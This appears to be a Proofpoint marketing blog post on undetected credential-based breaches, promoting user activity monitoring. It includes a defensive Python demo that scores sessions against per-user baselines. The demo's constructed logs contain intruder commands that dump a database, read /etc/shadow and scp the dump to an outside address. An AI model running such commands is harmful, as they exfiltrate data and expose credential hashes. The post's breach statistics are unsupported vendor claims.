Reports of data breaches have become a daily occurrence. As we’ve highlighted in our past Breach Reports, many companies don’t discover a breach until months after the initial compromise, and the breach is often found by an external party rather than by the organisation itself.
Although a share of data breaches stem from internal negligence or insider malice, most are caused by outside threats. These attackers steal legitimate user credentials in order to access systems without being noticed. Companies invest heavily in keeping employee credentials secure, but these measures are often not enough, and attackers still manage to gain access to employee credentials. In fact, over 67% of data breaches involve stolen credentials.
Why are breaches occurring?
Once a malicious user has obtained privileged credentials, it is almost impossible for a traditional intrusion detection system to differentiate between actions performed by the legitimate user whose credentials were stolen and actions performed by an intruder logging in with those same credentials. Every request is authenticated and authorised, so as long as the intruder stays within the access boundaries of the credentials obtained, there is nothing at the network or access-control layer for these systems to distinguish. Worse, the intruder can use that initial foothold to harvest additional credentials and escalate privileges further.
So what are companies doing today to mitigate this risk and why isn’t it working?
Typically, companies first look to logs. However, a major problem with log tooling is that most logs were written for debugging purposes, not for tracking user activity. Logs are collected into a central repository such as a log management solution or SIEM, and these tools are only as good as what they are fed. To date we have been feeding them enormous amounts of machine data: data about what is happening at the network and infrastructure layer. They are missing an absolutely critical viewpoint: what users are actually doing on top of that infrastructure.
Companies’ second step is to focus on alerting on potential threats. This can prove counterproductive, because in most cases only about one alert in ten turns out to warrant an incident investigation; the other nine are wasted effort. Companies spend plenty of money on these alerting systems but not enough on the response teams who have to review the alerts. As a result, false alerts make the real ones harder to pick out for understaffed response teams.
So how can we improve?
In order to combat the spotty effectiveness of logs and threat detection, companies must start to focus on the missing vantage point: privileged user activity monitoring. Proofpoint User Activity Monitoring uses on-screen activity recording to capture what users do once logged into critical servers. The captured activity is turned into a video, giving IT security the ability to play back any user session either in real time or historically.
Yet for analysis, video on its own lacks pinpoint capability: it cannot single out a security issue by itself, so it still has to be reviewed manually. Proofpoint addresses this with our visual interpretation technology, which turns captured on-screen activity into searchable, analysable and reportable machine data. Security teams can then work from a list of the actions in the session rather than watching the recording end to end, and can quickly find the actions they are looking for. This visibility significantly improves forensic capability by letting an analyst rapidly triage and diagnose an alert.
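As an added illustration, and not code from the original post or from Proofpoint ITM, the script below demonstrates the two points made above: the credential-based view described earlier, where an intruder holding the same password is indistinguishable from the legitimate user, and the searchable, structured activity records described in this paragraph. It goes slightly beyond the text by adding a per-user behavioural baseline (usual source address, working hours, programs run) and ranking sessions by how far they deviate from it. The log format, the user name jsmith, the hosts, addresses and every log line are constructed for this example; a real deployment would read records from whatever activity collector is in place.

```python
"""
Added illustration, not code from the original post or from Proofpoint ITM.
Shows, on constructed data, that a credential check passes the legitimate
user and an intruder using the same password identically, and that
structured, searchable per-user activity records let a baseline single the
intruder's session out. Hypothetical record format (assumed, not from the page):
    <ISO timestamp> user=<name> src=<ip> host=<server> action=<what was done>
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed activity records: two routine sessions by jsmith from the usual
# workstation, then a session with the same credentials from an outside
# address at 03:41 that dumps a table and reads /etc/shadow.
RAW_ACTIVITY = """\
2024-03-04T09:12:05 user=jsmith src=10.1.20.15 host=db01 action=login
2024-03-04T09:12:40 user=jsmith src=10.1.20.15 host=db01 action=psql -c "SELECT count(*) FROM orders"
2024-03-04T09:15:02 user=jsmith src=10.1.20.15 host=db01 action=tail -n 50 /var/log/postgresql/postgresql.log
2024-03-05T10:03:11 user=jsmith src=10.1.20.15 host=db01 action=login
2024-03-05T10:05:30 user=jsmith src=10.1.20.15 host=db01 action=psql -c "SELECT count(*) FROM orders"
2024-03-06T03:41:07 user=jsmith src=203.0.113.77 host=db01 action=login
2024-03-06T03:41:50 user=jsmith src=203.0.113.77 host=db01 action=pg_dump orders > /tmp/.o.sql
2024-03-06T03:43:12 user=jsmith src=203.0.113.77 host=db01 action=sudo cat /etc/shadow
2024-03-06T03:44:00 user=jsmith src=203.0.113.77 host=db01 action=scp /tmp/.o.sql 203.0.113.77:/srv/
"""

LINE_RE = re.compile(r"^(\S+) user=(\S+) src=(\S+) host=(\S+) action=(.*)$")
KNOWN_USERS = {"jsmith"}  # stands in for the credential store (assumed)


def parse_events(raw):
    """Turn flat activity lines into dicts: ts, user, src, host, action."""
    events = []
    for line in raw.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, user, src, host, action = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "user": user,
                           "src": src, "host": host, "action": action})
    return events


def credentials_valid(event):
    """All a credential gate can see: the account is real. The legitimate
    user and the intruder holding the same password both pass."""
    return event["user"] in KNOWN_USERS


def program(action):
    """First token of the action, e.g. 'psql' or 'sudo'."""
    parts = action.split()
    return parts[0] if parts else ""


def build_baseline(events, before):
    """Per-user profile from activity before the cutoff: source addresses,
    hours of day and programs the user normally runs."""
    profile = defaultdict(lambda: {"sources": set(), "hours": set(), "programs": set()})
    for e in events:
        if e["ts"] < before:
            p = profile[e["user"]]
            p["sources"].add(e["src"])
            p["hours"].add(e["ts"].hour)
            p["programs"].add(program(e["action"]))
    return profile


def score_session(session, baseline):
    """Count the ways one session deviates from its user's own baseline."""
    p = baseline.get(session[0]["user"])
    if p is None:
        return 1, ["no baseline for user"]
    reasons = []
    reasons += [f"new source {s}" for s in sorted({e["src"] for e in session} - p["sources"])]
    reasons += [f"unusual hour {h:02d}:00" for h in sorted({e["ts"].hour for e in session} - p["hours"])]
    reasons += [f"new program {pr}" for pr in sorted({program(e["action"]) for e in session} - p["programs"])]
    return len(reasons), reasons


def triage(raw, cutoff):
    """Group events into (user, src, day) sessions, score each against the
    baseline built from activity before `cutoff` (ISO date), rank by score."""
    events = parse_events(raw)
    baseline = build_baseline(events, datetime.fromisoformat(cutoff))
    sessions = defaultdict(list)
    for e in events:
        sessions[(e["user"], e["src"], e["ts"].date())].append(e)
    ranked = [(key, *score_session(s, baseline)) for key, s in sessions.items()]
    ranked.sort(key=lambda r: r[1], reverse=True)
    return ranked


def search_actions(events, needle):
    """The 'searchable machine data' point: find actions by substring."""
    return [e for e in events if needle in e["action"]]


if __name__ == "__main__":
    evts = parse_events(RAW_ACTIVITY)
    print("credential gate verdicts:", [credentials_valid(e) for e in evts])
    for key, score, reasons in triage(RAW_ACTIVITY, "2024-03-06"):
        print(key, score, reasons)
```

Run as-is, the credential gate returns True for all nine events, while the session from 203.0.113.77 on 2024-03-06 scores 5 (new source, unusual hour, and three programs jsmith had never run) and the two routine sessions score 0. The exact-set comparison of hours and programs is deliberately simple; a production baseline would use a window of hours and a longer history so that a user running a new but harmless tool does not raise an alert every time.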
So why are 85% of breaches going undetected?
The answer is simple: with all our investment in infrastructure security and prevention, we forgot a critical component, our users. User activity monitoring is rapidly becoming an integral part of security monitoring and data breach detection because it fills this most critical gap and integrates easily with the other key components of a security architecture. It is a simple concept that has worked in the physical world for ages and that the digital world has been missing until now. Unless companies introduce proper user-focused monitoring tools, data breaches will continue to go undetected.
So stop trying to infer what your users are doing from the logs of your machines; instead, turn your user activity into machine-parsable data with Proofpoint ITM.